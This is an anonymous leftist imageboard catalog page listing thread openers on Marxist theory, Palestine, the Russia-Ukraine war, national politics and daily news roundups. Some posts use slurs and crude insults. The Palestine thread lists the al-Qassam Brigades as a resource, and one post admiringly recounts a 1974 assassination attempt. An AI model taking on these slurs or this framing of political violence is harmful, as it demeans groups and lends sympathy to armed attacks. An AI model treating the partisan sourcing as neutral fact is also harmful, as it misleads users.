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Catalog (/Leftist Politically Incorrect/)

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R: 189 / I: 24 (sticky)


Leftypedia lived - Leftypedia lives - Leftypedia will live!

Greetings, comrades. Leftypedia, the radical encyclopedia, should be back in a usable state. We have more moderators, which will help with spam from now on, and images are slowly being repopulated for your viewing pleasure. The new domain has been up and running for a while at https://wiki.leftypol.org, and we've imported the vast majority of content that was on the old site while adding a lot of new stuff. I hope that Anons can come back and fill in any content that was lost.

For those unaware, Leftypedia is an original /leftypol/ project dedicated to combating the disinformation of mainstream media and academic sources, as well as discussing leftist history, theory, and practice from a multi-sectarian viewpoint. We welcome additions from different leftist perspectives provided that they are properly sourced and well argued. In addition, we maintain a separate space, tentatively titled "Essays", for more subjective or polemic work.

The original thread is here: >>>/edu/3780
You can find Leftypedia at: https://wiki.leftypol.org
Help for new editors: https://wiki.leftypol.org/wiki/Leftypedia:Community_portal
R: 1 / I: 0 (sticky)  

Welcome Thread

Search the catalog before starting a new thread to avoid duplicates: https://www.leftypol.org/leftypol/catalog.html
An FAQ including formatting and style guide and simplified rules can be found here: https://leftypol.org/faq.html & https://leftypol.org/rules.html

For technical issues use >>>/meta/34491
Dispute bans using the ban appeal form or >>>/meta/34464

Read This Before Posting:
If this is your first visit, lurk for a while before posting. /leftypol/ is an imageboard for non-sectarian leftist political discussion. The staff aims to allow everything within these bounds. To that end there are some critical rules (for /leftypol/):
* No Spam
* No New Threads for Topics with an existing General thread (e.g. USA politics, COVID-19, online personalities, etc.)
* No Reactionary or Identity Politics
* No Explicit Images including Porn without spoiler warning
Low quality threads are subject to be anchored or locked at volunteers discretion.

You may dispute actions taken by the staff or offer suggestions in >>>/meta/

Useful Links:
Search function - Find your favorite (or least favorite) posts!

Leftypol Twitter - Follow us on Twitter for status updates and leftist memes

Leftypol TikTok - Because this place is not giving you enough dopamine rushes

/leftypol/ Cytube Community - Watch news, riot porn, or movies with comrades!
-coming soon-

Onion Link - Connect anonymously via Onion!

Board Logs - Global and /leftypol/ logs

Matrix Congress - Public Moderation Room
NOTE: Due to recent cyber-attacks, please ask for an invitation to the congress in the public waiting room: https://matrix.to/#/#leftypol-antechamber:matrix.org

Matrix General Chat - Leftypol General Chat
If you don't want to use matrix you can interact with the chat through #[email protected] too.

Leftybooru - To upload, tag, and organize images

Leftypedia - A wiki project
-coming soon-
R: 3 / I: 1

Louis Althusser

Are there any contemporary Marxist theorists who still agree with and defend Althusser's theories and method?

I've been getting back to Althusser's writings and I find myself agreeing with him more and more, but his works have received a lot of heavy backlash over the years (especially since the academic Marxist community all seems hellbent on returning to Hegel and are just accepting Hegel's method as it is). I know Badiou still reveres him as does Balibar.

>inb4 strangled wife

I know…
R: 1 / I: 0
Puttana of Fascism, left-wing neocon, who's that I only know Lenin and Stalin, genocidal tankie (trainie if you will)…has Trotsky achieved full compass unity?
R: 500 / I: 148


🗽United States Politics🦅

>Absolute State of America Edition

Thread for the hellish discussion related to the greatest, best country God has ever given man on the face of the Earth.


State mandated propaganda livestreams:
CNN: https://www.livenewsnow.com/american/cnn-news-usa.html
MSNBC: https://www.livenewsnow.com/american/msnbc.html
FOX: https://www.livenewsnow.com/american/fox-news-channel.html
Bloomberg: https://www.youtube.com/watch?v=dp8PhLsUcFEegalitarianism
R: 163 / I: 49

Palestine vs The Zionist Entity: ur mum edition


🚨 Live Happenings/Updates 🚨
Sites that have active live-blogs:
• Al-Jazeera: https://www.aljazeera.com/

• Middle East Eye: https://www.middleeasteye.net/israel-palestine-hamas-war-gaza-live-invasion

• The Guardian: https://www.theguardian.com/world/palestinian-territories

• Times of Israel: https://www.timesofisrael.com/topic/liveblog/ (trigger warning)


Our own wiki. Be sure to add to it and create branching articles:



From the UK, single issue long time Palestinian investigative and general reporting, critical source

From the USA

Regional news from an anti-imperialist perspective

Premier Human Rights org

Left news and opinion webzine from Tel-Aviv

A collection of resources for organizers and anyone who wants to learn more about Palestine

Known anti-zionist academic Norman Finkelstein's blog



al-Qassam Brigades









(This includes blatantly obvious concern failtrolling/fedposting, painfully unfunny/nuclear misanthropic autism [ie. /pol/] and derailing/hyper sectarian schizophrenia)

Always remember to double-check your sources, as well as provide access to it. Twitter randoms isn't a source.

الله أكبر
.الى جميع الكادحين في الشرق، ان مصيركم في ايديكم
!يا عمال العالم ويا شعوبه المضطهدة، اتحدوا
R: 456 / I: 155

/isg/ - Internet Spectacle General

A thread focused on discussing the parasocial relationships cultivated by the Almighty Algorithm to generate profit off of our atomization and society's commodification of petty internet drama.
Brace through the hyper-real lacanian void together with the Leftypol Twitter account:

Reminder That None of This Is Real!
ɢʀᴀʙ ᴀ ᴘᴀɪʀ ᴏꜰ sᴘᴇᴄᴛᴀᴄʟᴇs


>The Society of the Spectacle (1967) by Guy Debord
📖 • https://www.marxists.org/reference/archive/debord/society.htm
📺 • https://www.youtube.com/watch?v=0blWjssVoUQ

<The Work of Art in the Age of Mechanical Reproduction (1936) by Walter Benjamin

📖 • https://www.marxists.org/reference/subject/philosophy/works/ge/benjamin.htm
📺 • https://www.youtube.com/watch?v=blq9sCIyXgA

>The Culture Industry from Dialectic of Enlightenment (1944) by Theodore Adorno & Max Horkheimer

📓 • https://www.marxists.org/reference/archive/adorno/1944/culture-industry.htm
📖 • https://libcom.org/article/dialectic-enlightenment-philosophical-fragments-theodor-adorno-and-marx-horkheimer
📺 • https://www.youtube.com/watch?v=5hSLdd8R8mY

<One-Dimensional Man (1964) by Herbert Marcuse

📖 • https://libcom.org/article/one-dimensional-man-studies-ideology-advanced-industrial-society-herbert-marcuse
📺 • https://www.youtube.com/watch?v=9ZCoLbEkAqs

>Discipline and Punish (1975) by Michel Foucault

📖 • https://theanarchistlibrary.org/library/michel-foucault-discipline-and-punishment
📺 • https://www.youtube.com/watch?v=s82uU4iRuko

<Simulacra and Simulation (1981) by Jean Baudrillard

📖 • https://libgen.is/book/index.php?md5=DBF3E860993373223D72E98FADF0F2DC
📺 • https://www.youtube.com/watch?v=S96e6TdJlNE

>Manufacturing Consent (1988) by Edward S. Herman & Noam Chomsky

📖 • https://libcom.org/article/manufacturing-consent-political-economy-mass-media-noam-chomsky-and-edward-s-herman
📺 • https://www.youtube.com/watch?v=34LGPIXvU5M

<The Sublime Object of Ideology (1989) by Slavoj Zizek

📖 • https://libgen.is/book/index.php?md5=054E022C8BD24EE2C5595B575BCED7DC
📺 • https://www.youtube.com/watch?v=TtIckkHsUQ4

>Postscript on the Societies of Control (1990) by Gilles Deleuze

📖 • https://theanarchistlibrary.org/library/gilles-deleuze-postscript-on-the-societies-of-control
📺 • https://www.youtube.com/watch?v=Hu4Cq_-bLlY

<Postmodernism, or, the Cultural Logic of Late Capitalism (1991) by Fredric Jameson

📖 • https://libgen.is/book/index.php?md5=5BD20E0E22FC8BC2CB4F8A7760D57027
📺 • https://www.youtube.com/watch?v=9RtV0oO8Pmg

>Spectres of Marx (1993) by Jacques Derrida

📖 • https://libcom.org/library/specters-marx-jacques-derrida
📺 • https://www.youtube.com/watch?v=TJr0NwXWb6Q

<Capitalist Realism (2009) by Mark Fisher

📖 • https://libcom.org/article/capitalist-realism-mark-fisher
📺 • https://www.youtube.com/watch?v=6Cb5XJH4NMI



>Precursor Material to Post-modernity and Critical Theory

📖 • Karl Marx - Book 1, Chapter 4 of Economic and Philosophic Manuscripts (1844)
📺 • Why Marx Was Right: Alienation - PlasticPills

📖 • Georg Lukács - Chapter 4 of History and Class Consciousness (1923)
📺 • Marxism After Marx: Reification - The Marxist Project

📖 • Antonio Gramsci - Book 1, Chapter 1 of Selections from the Prison Notebooks (1929)
📺 • Hegemony: WTF? An introduction to Gramsci and cultural hegemony - Tom Nicholas

📖 • Louis Althusser - Ideology and Ideological State Apparatuses (1970)
📺 • Althusser's Concept of Ideology: A Discussion with Anthony Gavin - Acid Horizon

<On Neo-Liberalism and Post-Fordism

[Work in progress]


The Society of the Spectacle (1974) by Guy Debord

Manufacturing Consent (1992) by Mark Achbar & Peter Wintonick, with Noam Chomsky

The Pervert's Guide to Cinema (2006) and The Pervert's Guide to Ideology (2012) by Sophie Fiennes, with Slavoj Zizek

HyperNormalisation (2006) by Adam Curtis

<Easy-Bake Breadtube (for absolute beginners)

We're All Fake Now - Wisecrack

Are Cell Phones Replacing Reality? - PBS Idea Channel

The Cultural Significance of Cyberpunk - Cuck Philosophy

Introduction to Critical Theory for the 21st Century - NATHANOLOGY


I Don’t Want to Be an Internet Person by Ginevra Davis

Pluralistic: Tiktok's enshittification by Cory Doctorow

Facebook's Threads is so depressing by Jason O. Gilbert
R: 500 / I: 127

/ukr/ - Russia-Ukraine war general

Remember!!: Take your meds!

Previous thread: >>>/leftypol/1909563


Evidence of the influence and origin of neo-Nazi groups in Ukraine



Live maps and updates
DeepStateMap: https://deepstatemap.live
Events in Ukraine: https://eventsinukraine.substack.com/
SouthFront: https://southfront.org/category/all-articles/world/europe/ukraine/

Watch Together
📺 News/events: https://tv.leftypol.org/r/HappeningsviaKlash
📺 Hangout/chill: https://tv.leftypol.org/r/bloodcast

Watch By Yourself
>Video Essays / Historical Background
📺 • Ukraine: The Avoidable War - Boy Boy

📺 • America, Russia, and Ukraine's Far Right - Gravel Institute

📺 • Crimea vs Taiwan: Who Gets Self-Determination? - BadEmpanada

📺 • The Nature of Putin's Russia and Its Causes (3-Part Series) - 1Dime

<Current Happenings

📺 • The Grayzone: https://www.youtube.com/@thegrayzone7996
📺 • DDGeopolitics: https://www.youtube.com/@DDGeopolitics
📺 • Defense Politics Asia: https://www.youtube.com/@DefensePoliticsAsia
📺 • The Duran: https://www.youtube.com/channel/UCdeMVChrumySxV9N1w0Au-w
📺 • The News Atlas: https://www.youtube.com/c/thenewatlas
📺 • Military Summary: https://www.youtube.com/@militarysummary


Social media



Thread guidelines:
• Please remember to add a spoiler to NSFW and extreme content such as graphic violence and gore.
• Try your best to not derail discussion too much from the main events and relevant places where the war is taken place, as well as other happenings, groups and public figures related to it.
• Meta discussion of the historical, philosophical and ideological background of the war is fine as long as its done in good faith and comradely.
• In the event the meta discussion overstays its welcome, participating users will be referred to take the conversation to the MULTIPOLARISM general thread: >>>/leftypol/1590991
• Quality shitposting and original content is encouraged! Spamming glowie memes is low effort.
• Remember to take your meds! It helps mediate schizoposting and foot fetishism
• this is /isg/ for people who treat geopolitics like shitty map games
R: 60 / I: 16

/leftybritpol/ - WE WILL NOT BE A CYCLICAL edition

/leftybritpol/ has not been and never will be a cyclical thread. Making us one goes against a decade of /leftypol/ tradition and the mods must correct their mistake immediately!

Anyways… Jeremy Corbyn has addressed a meeting on the formation of a new socialist party called 'Collective'. The party intends to position itself to the left of Starmer's Labour, and has received backing from a number of left-wing figures including Len McCluskey and Andrew Feinstein.
It is not yet clear whether the four other pro-palestine independent MPs will join the party, however if they did Collective would have the same number of MPs in Parliament as Reform and the DUP.

Details of the meeting, including attendees, can be found in this article:
R: 29 / I: 2


Before this site went down, there's was a thread about genuine good lefty YouTuber, not pop breadtuber, but real dudes that read and know their stuff. So, what's some kino genuine good lefty tuber?

The only one that comes to mind now is CCK aka cuck philosophy
R: 396 / I: 79

/Internationalism/ General - New generation edition

>thread 1
>thread 2
>thread 3
>thread 4
>thread 5
>thread 6
>thread 7
>thread 8
>thread 9
>thread 10
>thread 11


"This is gonna be the last "anti-campist" thread, probably one more to go before it fizzles."

- Χαμένο Κορμί, way too many threads ago

Here you can come to discuss the most recent global international developments, multipolarity in primis.
But what is multipolarity? The emergence of China, the reassertion of Russia, the rise of regional powers like India, Brazil, and South Africa, among others, suggest a new global development, but is it towards a world where multiple powers exist in a state of relative equilibrium, hence challenging the unipolar hegemony led by the United States post-Cold War, or Capitalism 2: Electric Boogaloo - Neo-Dengism Edition?
To what extent is cheering on this developing state of affaris just capitalist nationalism? If the whole thrust of socialism is now just "America bad" what becomes of the classical socialist goals of workers control of the means of production, and abolishing class society?

Related national threads:
🇿🇦 • /africa/ - Africa general >>>/leftypol/1831758
🇧🇷 • /brg/ - Brazil general >>>/leftypol/1880511
🇷🇺🇺🇦 • /ukr/ - Russia-Ukraine war general >>>/leftypol/1909563
🇮🇳 • /subcontinental/ - India, Pakistan, Nepal, Bangladesh, Buthan general >>>/leftypol/1828924
🇨🇳 • /prc/ - People's Republic of China general >>>/leftypol/211384

Telegram channels with Revolutionary Defeatist positions in the conflict zones (RU/DNR/UA) -
(use machine translation)

R: 52 / I: 3

Hot take about Ukranian young forced conscripts are not equal neo-nazis

Whole Ukranian army are not equal as Azov Battalion Neo-Nazis, since way too many celebrating random young adults dying in Ukranian war. Same applies for NAFOcels celebrating young Russians dying should not be celebrated. Porkies in booth Ukraine and Russia wants young army to die for rich old Porks.
R: 288 / I: 109

/leftydeutschpol/ - Deutschland General

Deutschland General
R: 500 / I: 83

/prc/ - People's Republic of China general

A general thread for all China related discussion.

Original threads:
leftypol.org archives:
bunekrchan.xyz archives:
R: 53 / I: 6

Billionaire BUSTED by the feds

Material explanation?

How should we feel about this? I hate billionaires but I equally despise the FBI. He was also a serial domestic abuser.

>inb4 "CNN"

Yeah I hate CNN too.
R: 40 / I: 11
Is the story of Polish Haitians a myth? Every time I see people arguing whether or not the Haitian revolution was a genocide I see people rush to point out that the Haitians let Poles live, but I've found evidence that this is a fake story.
R: 5 / I: 1
>guy named Stirner
>has gigantic forehead
What did Engels mean by this?
R: 180 / I: 33

/brg/ - Brazil General

Election edition

O lugar mais web-revolucionários para discutir as idas e vindas de nossa amada Pindorama.
Edição anterior: >>1942582
R: 104 / I: 15
How do we feel about outing celebrities and everyday institutions as Zionists?

O personally, I believe this is crucial to BDS as the Palestinian people themselves have asked us not only to damage the Zionist Entity’s economy but also remove any and all traces of Zionism from our everyday lives. Think about the banality of evil. Zionism is normalized in the West because we allow it to be normalized.

We need to decolonize our minds for real.
R: 77 / I: 6

Mental Illness Thread

[Reworded because the OP was an obvious bait, although the discussion retained was valuable]
In a modern society, where Mental Illnesses has been scientifically discussed and thoroughly studied, how will Leftists address its treatment and discovery?
[Retarded bait examples were given in this space. Usual /pol/ nonsense to incite the netizens of /leftypol/]
[A mention to "Chris Chan" was made in the original thumbnail, leading to discussion below]
R: 55 / I: 11

Anti-Idpol General

A thread to discuss Identity politics, As we communicate on a 'anti-identity politics' website It is important to understand first of all what IDPOL is and Isn't, how they exists and affects us and what causes IDPOL, the different superstructural expressions of IDPOL and how it is weaponized by the state, by capital and by the right.
What follows is the shared understanding of IDPOL we have on this site;
>An important part of /leftypol/’s unique character is our opposition to identity politics. We believe that conflicts between genders, races, sexualities, and so on are distractions from the wider class struggle that are intentionally fanned by the ruling class. This does not mean that oppression based on personal characteristics does not exist, but that it should be approached from an egalitarian perspective which is not personally accusatory and does not assign ‘victim’ and ‘oppressor’ groups. The rights of individuals to live according to their own wishes is a fundamental part of leftism.
Vidrel: Frantz Fanon vs Identity Politics. inb4 /ISG/, it's tertiary, I didn't have any good related images.
R: 1 / I: 0

Call for Social Investigation


>I want to carry out the Mass Line just like Mao said, R-really, I do! I just have no friends I haven't been able to touch grass for years!

Anyone ever read about any decent attempts at social investigation? Or is it a pointless exercise?
R: 3 / I: 1


canada thread continuing from >>1878602

gonna try and make a cool OP for this involving a few party sites and news outlets (note it's not complete if theres other shit that should be added in the next thread post it)


R: 510 / I: 127


R: 10 / I: 1

Does inflation make everyone wealthier

In a closed system, the tendency of capital to accumulate to one source is unrestricted. However, the introduction of inflation with its attachment to the things produced through labour ensure that there is a constant stream of capital flowing through any system. Therefore, shouldn’t inflation (and also just shitloads of work) overtime ensure that everyone inevitably ends up wealthier overtime?
R: 6 / I: 1

News 9/18/24

Counterprotesters clash with Morales supporters in Bolivia
Supporters of Mr Morales, raising multicoloured indigenous flags and chanting slogans against Bolivia’s economic crisis, surged toward them, using slingshots to pelt their adversaries with stones as police in pick-up trucks and on motorcycles looked on. They soon forced the counterprotesters to retreat, with their shouts of “Evo, Bolivia wants you back!” drowning out the pro-Arce activists who chanted: “Evo, you traitor, your time has passed.”

Alleged ELN attack in eastern Colombia “practically closes peace process:” Petro
According to newspaper El Espectador, Monday’s attack caused tensions inside the government between those who want to put an end to the peace talks and those who want to continue.

West Papua rebels propose terms for release of New Zealand pilot Phillip Mehrtens
On Tuesday, the army released a statement outlining the terms of his release, detailing a number of conditions “to be followed” by the Indonesian government, including allowing “open access” for media to be involved in the release process. It also called for the Indonesian government to suspend military operations during Mehrten’s release.

Claims of animal remains near puja pandal put Rajasthan town on edge, police say dogs to blame
According to officials, rumours started doing the rounds around 7:30 am on Wednesday, when the remains of a goat were allegedly found near a pond where idols had been immersed. As news spread, local right-wing outfits alleged someone had deliberately thrown the remains there.

Leaked Bill Reveals "Unprecedented Assault" on Pakistani Constitution
The constitutional changes would reshape Pakistan’s legal landscape, including through the creation of a parallel judicial body called the Constitutional Court. This new entity would take over key responsibilities from the Supreme Court, including the authority to hear cases involving constitutional challenges and fundamental rights.

Three soldiers killed in YPJ operation against Turkish base in Manbij
The Women’s Protection Units (YPJ) launched an operation on the Manbij resistance frontlines to honor the memory of martyr Shervin Sardar. On September 10th, YPJ fighters from the Manbij resistance front targeted the Turkish occupation army’s base in the village of Bashli, located northwest of Manbij.

Nine dead, over 300 wounded in new wave of Lebanon device blasts: health ministry
Nine people were killed and over 300 wounded Wednesday when walkie-talkies exploded across Lebanon, the government said, a day after pagers used by Hezbollah blew up, killing 12 and wounding up to 2,800.

How woman with coconut placard was tracked down, taken to court - and acquitted
She was accused of this offence – of which she was found not guilty on Friday – because of what was on the other side of that placard. It was a drawing of a palm tree with coconuts falling off it; pasted over two of those coconuts were the faces of Ms Braverman and of the then-Prime Minister Rishi Sunak. At the heart of this case was the word “coconut” - and whether it could be considered racially abusive.

Train drivers vote to end longest strike in recent history
TRAIN drivers have voted overwhelmingly to accept a multi-year pay offer made by the new Labour government, ending a two-year dispute at 16 rail companies, their union said today.

Russian authorities step-up anti-immigrant measures and propaganda
In addition, LDPR deputies have proposed to abolish free education for immigrant children and introduce fees, claiming that there is a serious shortage of places in schools because of foreign children, as well as low school performance because foreign children have a poor command of the Russian language.
R: 500 / I: 71

/ biz /

Thread for all business/capitalism related stuff.

DOW/Market Watch Thread - monitoring the market, trends, fluctuations, etc.

Career - job/career advice and other related stuff from a leftist perspective. EX: How to get a job, promotion, skill, switch companies, resume, life hacks, etc.

Econ - Anything related to economic theory, political economy or finance theory or applications/analysis.
R: 6 / I: 6

Southeast Asian Politics


A lot of images and posts of the last general got broken. So I think it's better to make a new one.

Discuss anything on Southeast Asian politics. Coming 2024 Elections, open orgs, People that should be dead for different reasons running in Malaysia's elections or just random shit. There are still dozens of us… hopefully! Starting off this general with massive wave of cult sex camps.
Matrix room: https://matrix.to/#/#!YeYeuZuLSYkegWssey:matrix.org

Last threads:
R: 38 / I: 6

/HUNCOM/ Magyar Kommunista Fonál

Sziasztok kis pöcsike elvtársak. Újraélesztjük a magyar fonalat. Ki hol vót? Ki mit csinát? Ki hun baszódott meg?

>mégmielőtt Fidesz vs. Magyar Pítör

Senkit sem érdekel. Ez proletár föld.
R: 640 / I: 118 (full)

Palestine vs The Zionist Entity


🚨 Live Happenings/Updates 🚨

Al-Jazeera: https://www.aljazeera.com/news/liveblog/2024/7/31/israels-war-on-gaza-live-israel-hits-beirut-in-assassination-operation

Middle East Eye: https://www.middleeasteye.net/israel-palestine-hamas-war-gaza-live-invasion

The Guardian: https://www.theguardian.com/world/palestinian-territories

Times of Israel: https://www.timesofisrael.com/topic/liveblog/ (trigger warning)


Our own wiki. Be sure to add to it and create branching articles:



From the UK, single issue long time Palestinian investigative and general reporting, critical source

From the USA

Regional news from an anti-imperialist perspective

Premier Human Rights org

Left news and opinion webzine from Tel-Aviv

A collection of resources for organizers and anyone who wants to learn more about Palestine

Known anti-zionist academic Norman Finkelstein's blog



al-Qassam Brigades









(This includes blatantly obvious concern failtrolling/fedposting, painfully unfunny/nuclear misanthropic autism [ie. /pol/] and derailing/hyper sectarian schizophrenia)

Always remember to double-check your sources, as well as provide access to it.

الله أكبر
.الى جميع الكادحين في الشرق، ان مصيركم في ايديكم
!يا عمال العالم ويا شعوبه المضطهدة، اتحدوا
R: 23 / I: 9


This thread is for the discussion of cybercommunism, the planning of the socialist economy by computerized means, including discussions of related topics and creators. Drama belongs in /isg/

Towards a New Socialism by Paul Cockshott and Allin Cottrell: http://ricardo.ecn.wfu.edu/~cottrell/socialism_book/
Brain of the Firm by Stafford Beer
Cybernetic Revolutionaries by Eden Medina
Cybernetics: Or the Control and Communication in the Animal and the Machine and The Human Use of Human Beings (1st edition) by Norbert Wiener
Economic cybernetics by Nikolay Veduta
People's Republic of Walmart by Leigh Phillips and Michal Rozworski
Red Plenty by Francis Spufford
Economics in kind, Total socialisation and A system of socialisation by Otto Neurath (Incommensurability, Ecology, and Planning: Neurath in the Socialist Calculation Debate by Thomas Uebel provides a summary)

Active writers/creators
Sorted by last name
>Paul Cockshott
https://www.youtube.com/channel/UCVBfIU1_zO-P_R9keEGdDHQ (https://invidious.snopyta.org/channel/UCVBfIU1_zO-P_R9keEGdDHQ)
https://twitter.com/PaulCockshott (https://nitter.pussthecat.org/PaulCockshott)
>Cibcom (Spanish)
https://twitter.com/cibcomorg (https://nitter.pussthecat.org/cibcomorg)
https://www.youtube.com/channel/UCav9ad3TMuhiWV6yP5t2IpA (https://invidious.snopyta.org/channel/UCav9ad3TMuhiWV6yP5t2IpA)
>Tomas Härdin
https://www.youtube.com/channel/UC5fDgA_eHleDiTLC5qb5g8w (https://invidious.snopyta.org/channel/UC5fDgA_eHleDiTLC5qb5g8w)
>Elena Veduta
Various videos on YouTube but no channel of her own
>Dave Zachariah
One video on Paul Cockshott's channel

>General Intellect Unit
Podcast of the Cybernetic Marxists

Previous threads in chronological order
R: 255 / I: 54

/QTDDTOT/ - Questions that don't need their own thread

Dump all the seemingly pointless, dubious, and frivolous questions that don't deserve their own shitty threads.

Got a question that's probably been asked a million times before? You're in the right landfill, buddy. Post it here.

Threads that otherwise might go in here will eventually find themselves become merged to this thread.
R: 10 / I: 6

communistic shogunate

Aesthetics plays a major role in right wing and reactionary culture. Rightoids love to connect themselves to the past but leftists hate the past. Case study: turbo faggot Yukio Mishima and other samurai larpers. I mean none of this stuff will ever be historically accurate and is just a way of appealing to people. This begs the question, why doesn't the left do the same? If white alt rightoids want to connect their fascism to a mythical bushido and idea of a Japanese ethnostate warrior race, why can't we have a socialist samurism? A class struggle for a shogunate of the proletariat run by an elected proletarian shogun? Why can't we make up mythical bullshit too? Its not as if fealty to one's social class and struggle against enemy classes is some new idea. Fuck it. Why doesn't the left abuse and rape history and use it as a weapon too?
R: 13 / I: 0

What date will mark the end of the Post Cold War era?

As in, what will be 1991 for the End of History? Most people would say that it ended in 2022 due to the Russo-Ukrainian War. 2021 saw the end of the Afghanistan War and collapse of the Afghan comprador regime. 2016 saw the collapse of the confidence of the liberal order. 2008 saw the Great Recession and is arguably the beginning of its end. I think that historians will ultimately settle on 2022 but what are your thoughts?
R: 27 / I: 1
Now, i know what you will say. "But anon, Kamala Harris is bombing and raping kids in Gaza!", "Kamala Harris is a KKKop that brutally persecutes people", "Bourgeois elections are fake and gay!".
However, consider the alternative of not voting for Kamala. Will voting for Jill Stein stop Palestinians from being genocided? Will denouncing the DNC on Xitter lead to a judicial reform in the United Snakes?
No in both cases. And here is where my core point lies: by not supporting the DNC, not only you fail to stop those two things, you are actively removing yourself from influencing the national body politics.

Comrades, we are not a humanitarian organization. We are political partisans. And our chief goal should be to seize power. Institutional power! We have to think in terms of decades, not in terms of years.
Where will the Left (trademark) be in thirty years? In fifty years? This is the question we must ask ourselves. And i believe that the only way to ensure the long term survival of our message is by making our voices integral to the platform and electoral strategy of the Democrati party, the same way the Alt Right has make their voice integral to the platform of the GOP, as seen by Trump echoing literal blood libel against Haitians on national tv, something that would've been unthinkable a decade ago.
Not by wasting our voices on literally who third party candidate.

Our rivals understand this. For example, why do you think Erdogan, the leader of the biggest Muslim country on the Middle East, not only does nothing about the genocide in Palestine but also covertly work with Israel until recently?
Because Erdogan views the occupation of Palestine not as a humanitarian issue, but as a systemic issue. Israel can freely genocide Palestinians because the Islamic world is weak. Therefore the solution is to make the Islamic world (a.k.a Turkey) strong, and if that necessitate working together with NATO and Israel in the short term, then so be it!
Or to use another example, why do you think Meloni doesn't kick out migrants from Italy? Because central to fascist philosophy is that the true problem facing the country isn't migrants; rather immigration is simply a window dressing of the spiritual decadence that is plaguing the people. And the way to solve this is by strengthening the State, by using cheap migrant labour if necessary.

Tl;Dr: weep for the Palestinian martyrs. Agitate on the streets. But remember that our true goal is influencing mass politics. And voting useless third parties everytime a genocide happens is not going to solve that
R: 23 / I: 28

OC Thread 17.0 - A New Beginning

Thread dedicated to /leftypol/ original content.
>Post original content you've made, or OC someone else recently made which you want to share.
<Or ITT collaborate on improving content already made.

If your original content is good enough, it would most likely be shared on the /leftypol/ twitter account!
Make sure to follow us and feel free to leave suggestions on this thread~

previous thread: >>1762168
>>>/leftypol_archive/1762168 (if it gets archived by mods)

New Booru:

R: 9 / I: 2

/ita/ - Spaghetti Communism

La situazione è tragica ma non seria

Nuovo filo perché il precedente - dopo solo due anni e mezzo - ha raggiunto il limite.
Prego astenersi drogati delle polemiche da gallinaio televisivo, feticisti della costituzione del quarantotto (in fila per sei senza resto), raccoglitori di firme per improbabili referendum destinati a fallire, tirapiedi dei "sindacati" confederali gialli, accoliti del culto di Sant'Enrico B., piddini e parapiddini, stronzi in generale.
Se proprio dobbiamo fare pettegolezzi, facciamoli su qualche bella fica o su cose divertenti.
E ricordate che alla prossima polemica sul "saluto romano", l'unico autentico è il classico
>Bella, fratè!
Tutto il resto è solo un pallido tentativo d'imitazione.
R: 123 / I: 41


A thread for the forgotten continent, so forgotten the thread got wiped since I made it that recently.

Discuss anything related to:
>Burkina Faso
>Cabo Verde
>Central African Republic (CAR)
>Congo, Democratic Republic of the
>Congo, Republic of the
>Cote d’Ivoire
>Equatorial Guinea
>Sao Tome and Principe
>Sierra Leone
>South Africa
>South Sudan
R: 5 / I: 2

News 9/17/24

Israel arrests dozens in West Bank raids, including wife of PFLP leader and journalist
Abla Saadat, wife of PFLP secretary general Ahmed Saadat who has been in prison since 2002, was arrested along with two other women in the Ramallah and Al-Bireh governorate in the central West Bank. In a video shared to social media, Saadat’s daughter said an Israeli military force of more than 20 soldiers stormed the family home and arrested her mother.

Lebanon’s health minister says 8 killed, 2,750 wounded by exploding pagers
Hezbollah said in an earlier statement on Tuesday that two of its fighters and a girl were killed as “pagers belonging to employees of various Hezbollah units and institutions exploded”, and said it was carrying out an investigation to determine the causes of the blasts.

Military activity and blockade continue in rural Lice
On 15 September evening, the Turkish army launched an operation in the rural neighbourhood of Peçar in Lice district of Amed (Diyarbakır). A large number of soldiers and village guards are reported to be taking part in the operation.

UK: Prosecutors drop charges against SOAS students over Palestine protest
Three students from the School of Oriental and African Studies (SOAS) appeared at Wood Green Crown Court on Tuesday after being arrested in July following a confrontation on campus between pro-Israel and pro-Palestine activists. But the Crown Prosecution Service told the court that it had decided to drop charges against two of the students, Haya Adam and Zaki Ali.

Belgrade Mayor’s Call for Memorial to Serbian Chetnik Leader Criticised
Historian Milovan Pisarri said the move is “unfortunately another act in the continuity of the policy that has been going on at the official level for 20 years, which entails the rehabilitation of those war criminals, that nationalist ideology and actually the project that the Chetniks themselves had about creating a Greater Serbia,” he said.

Malian army says capital Bamako ‘under control’ following gun attack
The military facility, located in the Feladie district on the southeastern outskirts of the capital near the main airport, came under attack early on Tuesday morning. Witnesses reported gunshots and explosions. .. .

Bangladesh opposition party rallies to demand a new election
The interim government headed by Nobel laureate Muhammad Yunus has rolled out a number of plans to reform various sectors of the country, from the Election Commission to financial institutions. But major political parties — including the BNP, which is headed by former Prime Minister Khaleda Zia — want the new election sometime soon.

Huge turnout expected for poll in India's disputed Kashmir region
A HUGE turnout is expected on Wednesday in crucial local elections in Indian-controlled Kashmir as voters attempt to deny victory to Prime Minister Narendra Modi’s party in the disputed region.

Venezuelan opposition calls on US to cancel oil company licenses to pressure Maduro
Venezuela’s main opposition coalition on Monday called on the U.S. to cancel the licenses that allow Chevron and other energy companies to operate in the South American country to pressure President Nicolás Maduro to negotiate a transition from power.

Environmental and community activist Juan López murdered in Honduras
On Saturday, September 14, in Tocoa, Juan López, a Honduran environmentalist and councilman of the Municipality of Tocoa for the Liberty and Refoundation Party (Libre), was shot and killed. He was a dedicated environmental defender and was engaged in struggles against open-pit mining, for which he had been threatened on several occasions. As a result, the Inter-American Commission on Human Rights requested special protection to safeguard his life in 2023.
R: 346 / I: 166

/SEA/ - Southeast Asia and Oceania General

8th Edition: Failson squad assemble!edition.

Discuss anything on Southeast Asian politics. Coming 2024 Elections, open orgs, People that should be dead for different reasons running in Malaysia's elections or just random shit. There are still dozens of us… hopefully! South Asia and Oceania posters can come in to discuss their regional politics as well.

Matrix room: https://matrix.to/#/#!YeYeuZuLSYkegWssey:matrix.org

Last threads:
R: 6 / I: 0
On August 15, 1974, a young Japanese-born North Korean communist sympathizer named Mun Se-gwang attempted to assassinate South Korean capitalist dictator Park Chung-hee in hopes of sparking a popular revolution against the military dictatorship.

During his high school years in Japan, he read the selected works of Mao Zedong and Kim Il-sung. Later, he maintained contact with groups of Zainichi (Koreans living in Japan) who followed Juche ideology.

At the time of the attack, Park was giving a speech at a national theater in Seoul to mark the anniversary of South Korea's independence. Mun ran in and fired a total of five shots, killing Park's wife, Yuk Young-soo, with a shot to the head.

Mun would be arrested on the spot and hanged on December 20, 1974.

“I want to live under the sky of my homeland. Even when I set foot in my homeland with the purpose of killing him, I never knew that the sky of my homeland was so blue.”

Mun Se-gwang, 1974.
R: 47 / I: 12  

What’s up with the bulk

